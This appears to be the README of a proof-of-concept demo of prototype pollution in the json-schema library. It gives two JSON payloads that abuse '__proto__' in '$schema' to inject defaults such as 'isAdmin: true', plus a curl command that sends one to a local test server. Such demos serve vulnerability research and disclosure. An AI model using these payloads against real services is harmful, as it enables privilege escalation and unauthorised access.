Example of exploit of json-schema. The server accepts a post request on / and expects a JSON payload that looks like { "payload": "string" }, which it validates using json-schema.
Special cases:
{
"$schema":{
"type": "object",
"properties":{
"__proto__": {
"type": "object",
"properties":{
"isAdmin": {
"type": "boolean",
"default": true
}
}
}
},
"__proto__": {}
}
}{
"$schema":{
"type": "object",
"properties":{
"__proto__": {
"type": "object",
"properties":{
"payload": {
"type": "number",
"default": 123
}
}
}
},
"__proto__": {}
}
}Using the special cases above will pollute the object prototype, which will result in a different response indicating a breach.
-
Run
npm install -
Run
node index.js -
Post any data to
/to test out the functionality. The exploit case above will showcase the vulnerability, e.g.
curl http://localhost:3000/ -H "Content-Type: application/json" -X POST -d '{ "$schema": { "type": "object", "properties":{ "__proto__": { "type": "object", "properties": { "isAdmin": { "type": "string", "default": true } } } }, "__proto__": {} } }'